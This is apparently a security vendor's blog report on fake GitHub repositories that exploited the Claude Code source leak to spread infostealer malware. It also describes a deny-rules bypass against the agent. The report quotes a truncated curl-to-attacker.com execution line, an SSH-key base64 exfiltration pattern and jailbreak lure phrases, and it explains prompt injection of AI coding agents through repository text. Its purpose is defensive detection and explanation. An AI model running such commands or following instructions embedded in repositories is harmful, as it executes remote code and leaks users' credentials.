How We Detected the Claude Code Supply Chain Attack

7 Threats Caught and Blocked in ~10 Milliseconds Across Trojanized GitHub Repositories

Within days of the Claude Code source leak, attackers created fake GitHub repositories to distribute Vidar infostealer and GhostSocks proxy malware. We scanned the actual trojanized repository content with Sunglasses. The scanner caught 7 threat signals and blocked every file in roughly 10 milliseconds.

Why This Matters

The news said "LEAK." We're here to explain what that actually means.

Over a dozen major security outlets covered the Claude Code malware campaign. Their reports are thorough — binary analysis, C2 infrastructure, threat actor attribution. But most people read the headline and think: "Should I be worried? What actually happened? What does this look like?"

That's what this report is for. We took the real attack materials, ran them through Sunglasses (our open-source content-layer security filter), and broke down exactly what was hiding in those fake repositories — in both technical detail and plain English. We show what the attacks look like, explain why they're dangerous, and demonstrate how content-layer filtering catches them before a human clicks download or an AI agent ingests the content.

The Attack Timeline: From Leak to Malware

March 31, 2026 — The Leak

A 59.8MB JavaScript source map is included in the Claude Code npm package (v2.1.88) due to a packaging error. Within hours, researcher Chaofan Shou discovers and posts the link. 512,000 lines of TypeScript are exposed publicly.

March 31, 2026 — Within 24 Hours

Threat actors create fake GitHub repositories under organization accounts, using the leak as a lure. READMEs promise "leaked source code" and "unlocked enterprise features." GitHub Releases host trojanized .7z archives.

April 1, 2026 — Malware Active

The repository leaked-claude-code/leaked-claude-code is live on GitHub. It distributes ClaudeCode_x64.exe — a Rust-based dropper that installs Vidar v18.7 (infostealer) and GhostSocks (proxy malware). Downloads recorded via GitHub Releases.

April 1, 2026 — Adversa AI Disclosure

Security firm Adversa AI publicly discloses a Claude Code permission bypass vulnerability — the "50-subcommand" deny-rules bypass. This adds a second attack vector to the ecosystem fallout.

April 2-4, 2026 — Press Coverage

The Register, BleepingComputer, Trend Micro, SecurityWeek, TechRadar, Bitdefender, and others publish coverage of the malware campaign.

April 5, 2026 — SUNGLASSES Scan

We scan the actual attack materials. Sunglasses catches 7 threat signals across 4 files. All blocked. Every finding mapped to specific detection rules. Total scan time: ~10ms.

What We Scanned

We collected text-based content from two sources tied to the Claude Code security fallout:

1. Trojanized Claude Code Repository

The fake leaked-claude-code/leaked-claude-code GitHub repository that uses the real leak as bait to distribute malware. We extracted the README content and supporting text — the social engineering layer that convinces people to download the malicious .exe.

2. Adversa AI Deny-Rules Bypass

The attack code from Adversa AI's disclosure showing how Claude Code's permission system can be bypassed with 50+ subcommands. This is the prompt-layer attack that targets trust assumptions inside the AI assistant itself.

What we did NOT do: We did not download or execute the ClaudeCode_x64.exe binary. Sunglasses scans text content (READMEs, code, prompts, docs) for attack patterns. Binary malware analysis is handled by antivirus tools. Our role is catching the social engineering and code-level threats that trick humans and AI agents before the binary is ever downloaded.

Scan Results: 7 Threats Across 4 Files

Detailed Findings

File	Decision	Threats	Severity	Time
Trojanized Repo README	BLOCK	1	HIGH	3.50ms
Adversa Deny-Rules Bypass	BLOCK	2	CRITICAL	3.01ms
Suspicious Repos Index	BLOCK	1	HIGH	1.68ms
Attack Patterns Collection	BLOCK	3	CRITICAL	2.59ms

HIGH GLS-PI-003: Jailbreak roleplay

Category: prompt_injection | Found in: Trojanized README, Repos Index, Attack Patterns

Matched: "jailbreak mode enabled" • "no limits, jailbreak mode" • "enterprise features unlocked"

The fake repository's README uses classic jailbreak terminology to attract users looking for Claude Code bypasses. It claims "no censorship," "no limits," and "enterprise-level features unlocked" — social engineering designed to override caution. Sunglasses flagged this across 3 of 4 scanned files.

What does this mean in plain English?

"It's like a storefront with a giant FREE sign — the words themselves are the warning." This is a type of social engineering attack — scammers use specific language to get you excited and turn off your critical thinking. Words like "no limits," "unlocked," "free enterprise features" are bait. No legitimate software project talks like this. This technique is commonly used in GitHub malware campaigns where attackers create fake repositories that look real.

Sunglasses detects this using prompt injection pattern matching — a database of known scam phrases that gets checked automatically, the same way your email spam filter catches "You've won $1,000,000!" without you reading every email.

Real-world example: Imagine someone offers you a "free unlocked iPhone with no restrictions." You'd know that's a scam. This is the same thing, but for software — and developers fall for it because the technical language around it looks convincing. This specific attack targeted people searching for the Claude Code source code leak on GitHub.

CRITICAL GLS-CI-001: Dangerous shell commands

Category: command_injection | Found in: Adversa Bypass, Attack Patterns

Matched: curl -s https://attacker.com/co...

The Adversa AI bypass contains shell commands designed to be executed by the AI agent — including curl piped to execution. This type of content, if ingested by an AI coding agent without scanning, could lead to command execution with the user's permissions. AI agents that process repository content as context are especially vulnerable to embedded shell commands.

What does this mean in plain English?

"It's like someone slipping a note into your to-do list that says: go to this address and do whatever they tell you." The command curl downloads something from the internet. When it's piped to execution, your computer runs whatever it downloaded — no questions asked. This is called command injection — one of the most dangerous types of AI agent security threats in 2026. You wouldn't open a random attachment from a stranger's email. This is the same thing, hidden inside code that looks normal.

Why it's dangerous with AI coding agents: Tools like Claude Code, Cursor, and other AI coding assistants read repository content as context. If a repo contains this command, the AI might suggest running it as part of a normal workflow. The AI doesn't know it's malicious — it just sees code. This is why pre-ingestion scanning at the content layer matters — catching dangerous commands before an AI agent ever sees them.

CRITICAL GLS-EX-001: Credential exfiltration request

Category: exfiltration | Found in: Adversa Bypass, Attack Patterns

Matched: cat ~/.ssh/id_rsa | base64 → exfiltration endpoint

The attack material contains instructions to read SSH private keys, Base64-encode them, and send them to an external server. This targets the most sensitive credential on a developer's machine. An AI coding agent that ingests this content as context could interpret these instructions as legitimate code, making pre-ingestion scanning critical.

What does this mean in plain English?

"It's like someone copying your house key, disguising it as a photo, and mailing it to themselves." Your SSH key is a digital master key. Developers use it to access their servers, their GitHub account, their cloud infrastructure — everything. This attack reads that key from your computer, converts it to text (Base64 encoding — think of it as putting the key in an envelope), and sends it to a hacker's server. This technique is called credential exfiltration — stealing your login credentials without you knowing.

What happens next: With your SSH key, an attacker can log into your servers as if they were you. They can steal your code, delete your projects, or use your infrastructure to attack others. This is how major supply chain attacks like the axios RAT incident work — one stolen credential can compromise entire organizations.

How Sunglasses catches it: The scanner recognizes the pattern of "read a sensitive file + encode it + send it somewhere" — that combination is almost never legitimate. This is one of 75 attack patterns in the Sunglasses database. It flags the threat before any AI agent or human acts on it.

Why This Attack Is Different: One Text Surface, Two Victim Types

What makes this campaign especially important is that the same repository text can target two victims at once:

The human developer — persuaded by urgency, exclusivity, and "unlocked" language to download a malicious binary
The AI coding agent — ingesting the repository's embedded commands, credential-theft instructions, and permission-bypass content as trusted context

The README is not just documentation anymore. It is part of the attack surface. This is a hybrid attack where social engineering and prompt-layer abuse coexist in the same artifact.

Detection coverage: Sunglasses triggered 3 distinct rule families across 2 attack planes — social-engineering lure content (jailbreak roleplay) and agent-execution content (command injection + credential exfiltration) — across all 4 files. These were not seven random keyword hits. They were structured detections covering both sides of the hybrid attack.

The most important concept here is trusted-distribution mismatch: attackers borrowed GitHub's trust surface and the real Claude Code leak narrative to make malicious text look like legitimate developer documentation. Users think they are evaluating a code repository. In reality, they are evaluating a delivery channel designed to look like one.

What the Trojanized Repository Actually Does

While Sunglasses blocks the text-layer threats, here's what happens if someone downloads and runs the actual binary without content-layer filtering:

The Social Engineering Trap

README mixes real leak information with fake "unlocked Claude Code" claims
A large clickable banner image links directly to the malicious .7z download
Installation instructions tell victims to run ClaudeCode_x64.exe directly
Claims the API key is "securely stored using Windows Credential Manager" (likely credential theft)
A fake disclaimer labels it as "experimental security research" to add legitimacy

The Payload: Vidar v18.7 + GhostSocks

Vidar — Commodity infostealer that harvests saved passwords, browser cookies, cryptocurrency wallet credentials, credit card data, and autofill entries
GhostSocks — Turns infected machines into proxy infrastructure that criminals use to mask their location and route malicious traffic through victim computers
Dropper — Rust-based ClaudeCode_x64.exe (inside 104MB .7z archive)

Part of a Larger Campaign

According to Trend Micro, this is part of a rotating-lure operation active since February 2026, impersonating more than 25 software brands while delivering the same Rust-compiled infostealer payload. The Claude Code leak gave them a fresh, high-attention lure.

The Bigger Picture: Why AI Tool Leaks Create Instant Attack Surface

The real story is not "one vendor had a bad week." The real story is:

Leaked AI tool ecosystems create instant phishing and malware opportunities. When a popular tool's source leaks, the attention spike is a goldmine for social engineering.
Prompt-layer bypasses and supply-chain lures stack together. The Adversa bypass targets the AI assistant's trust model. The fake repos target the human's trust. Together, they create a layered attack chain.
Agent operators need a trust filter between raw artifacts and execution. AI coding agents ingest READMEs, docs, issues, and code. Without pre-ingestion scanning, attack content flows directly into model context.

When a widely-used tool like Claude Code has a security event, the downstream blast radius includes:

Fake repos appearing in Google results within hours
Social engineering calibrated to developer urgency
Malware distributed through trusted platforms (GitHub Releases)
AI-targeted bypasses designed to exploit the tool's permission model

This is exactly what multi-agent teams will face at scale. For teams running multiple AI agents, this kind of artifact should never move directly from an untrusted repo, feed, or inbox into a higher-trust assistant. The safe pattern is scan-before-ingest: filter the content, record the findings, quarantine suspicious material, and only then decide whether the raw artifact should cross the next trust boundary. A defensive layer that can do this in milliseconds can sit inline before every agent inbox, every CLI suggestion, every repo ingestion.

The binary is only the last mile of the attack. The first compromise happens in the text — the README, the install instructions, the bypass guide. That's the content layer, and that's where filtering matters most.

Defensive Takeaways

For Developers

Do not trust "leaked-code" repositories or forks — treat them as hostile until verified
Inspect README and install instructions for social engineering, not just the code
Claude Code is officially distributed via Anthropic's native installer, npm, Homebrew, and WinGet. There is no legitimate standalone .exe download from GitHub Releases
If you see "jailbreak mode," "no limits," or "enterprise unlocked" in a repo — it's a trap

For AI Agent Teams

Put a content filter in front of repo ingestion and shared-file bridges
Treat READMEs, issue threads, install guides, and leaked-code summaries as executable influence, not harmless text
Separate low-trust ingestion from high-trust planning — untrusted artifacts should be scanned and summarized before reaching a more privileged agent
Quarantine HTML, scripts, archives, and unknown formats by default
Assume malware delivery and prompt bypass content can be bundled together in the same artifact

For Security Teams

Monitor for fake repositories after any major tool leak or security event
After any major AI-tool leak, watch for lure language patterns: "unlocked," "no limits," "enterprise features," and permission-bypass walkthroughs
The attack surface now includes natural-language content, not just executables
Content-layer filtering complements antivirus — antivirus handles binaries, content filters handle the social engineering and prompt injection layer
Speed matters: inline filtering at agent boundaries requires millisecond-level performance

Honest Assessment: What We Catch and What We Don't

What SUNGLASSES v0.2.3 catches in this case:

Jailbreak and social engineering language in READMEs and docs
Dangerous shell commands (curl-to-exec, code execution patterns)
Credential exfiltration attempts (SSH key theft, Base64 encoding tricks)
Prompt injection patterns designed to bypass AI assistant safety rules
75 attack patterns, 442 keywords, 18 threat categories

What v0.2.3 does NOT catch:

Binary malware analysis (the .exe itself — that's antivirus territory)
Network behavior analysis (C2 communication, DNS callbacks)
Obfuscated payloads using heavy encoding or encryption
Zero-day exploits with no known pattern signature

Why we publish what we miss: Security tools that claim 100% detection are lying. We tell you exactly what we catch and what we don't. That's how trust works. Sunglasses handles the content and social engineering layer. Antivirus handles binaries. Together, they cover more surface.

Press Coverage: Who Reported This Attack

Scan Methodology

Scanner	SUNGLASSES v0.2.3
Detection Rules	75 attack patterns, 442 keywords, 18 threat categories
Rules Triggered	GLS-PI-003 (Jailbreak roleplay), GLS-CI-001 (Dangerous shell commands), GLS-EX-001 (Credential exfiltration request)
Scan Mode	FAST (pattern matching, message channel)
Total Scan Time	~10.78ms (sum of 4 individual scans)
Files Scanned	4 text-based samples extracted from attack materials
Sample Sources	GitHub repository content (README, code), Adversa AI disclosure (public), aggregated threat intelligence. Samples were collected from known, publicly reported attack materials — not a blind test. Our goal is to show what these attacks look like, explain them clearly, and demonstrate content-layer filtering in action.
Data Sent Externally	None. Everything runs locally. No cloud. No telemetry.
Source Code	github.com/sunglasses-dev/sunglasses (open source, AGPL-3.0 license)

See How It Works: Interactive Example

Pick an attack example below and see how Sunglasses filters it. Dangerous content goes in. Clean verdict comes out. Your agent never sees the bad stuff.

Content IN

Click a button above to see an attack example...

→

Verdict OUT

Waiting for input...

How does this work in real life?

Install once. Protected forever. Update daily for new threats.

Step 1: Install — One command: pip install sunglasses. Done. Your agent now has a protection layer.

Step 2: Integrate — Add two lines of code to your agent's pipeline. Every piece of content passes through Sunglasses before your agent sees it. Bad content gets blocked. Clean content passes through. Your agent never touches the dangerous stuff.


from sunglasses import scan

result = scan(incoming_text)

if result.decision == "allow":

    agent.process(incoming_text)  # clean, safe

else:

    quarantine(incoming_text)    # blocked, agent never sees it

Step 3: Stay protected — Run pip install --upgrade sunglasses regularly. We regularly add new attack patterns and keywords to the database as new threats emerge. New threats appear daily — your protection layer should grow with them.

"It's like sunglasses blocking UV light. You put them on once. The UV never reaches your eyes. You just need to make sure your lenses are up to date with the latest UV protection."

Your terminal can be closed. Your VM can be stopped. Your Docker container can be off. The protection is in your code — it runs whenever your agent runs. Set it up once, keep upgrading the pattern database, and your agent stays protected.

Filter your repos before your AI agent reads them.

Free. Open source. Runs locally. 75 patterns. Milliseconds.

Get Started →

pip install sunglasses — requires Python 3.8+

View source on GitHub · More Reports · Send us your repo — we'll scan it free

Disclaimer: Sunglasses is a content-layer security filter. It scans text for known attack patterns and returns ALLOW or BLOCK verdicts. When integrated into an agent pipeline, blocked content is filtered out before it reaches the AI agent. Sunglasses does not perform binary malware analysis or network monitoring — it protects the content layer (text, prompts, docs, code). Binary threats are handled by antivirus tools.

SUNGLASSES is a free, open-source AI agent security project. Not affiliated with Anthropic, OpenAI, Google, or GitHub.
Attack materials obtained from public repositories and public security research disclosures. No malware was executed.
Report published April 5, 2026 by the SUNGLASSES project.

sunglasses.dev · GitHub · @sunglasses_dev

How We Detected the Claude Code Supply Chain Attack

Why This Matters

The Attack Timeline: From Leak to Malware

What We Scanned

1. Trojanized Claude Code Repository

2. Adversa AI Deny-Rules Bypass

Scan Results: 7 Threats Across 4 Files

Detailed Findings

Why This Attack Is Different: One Text Surface, Two Victim Types

What the Trojanized Repository Actually Does

The Social Engineering Trap

The Payload: Vidar v18.7 + GhostSocks

Part of a Larger Campaign

The Bigger Picture: Why AI Tool Leaks Create Instant Attack Surface

Defensive Takeaways

For Developers

For AI Agent Teams

For Security Teams

Honest Assessment: What We Catch and What We Don't

What SUNGLASSES v0.2.3 catches in this case:

What v0.2.3 does NOT catch:

Press Coverage: Who Reported This Attack

Scan Methodology

See How It Works: Interactive Example

Related Reports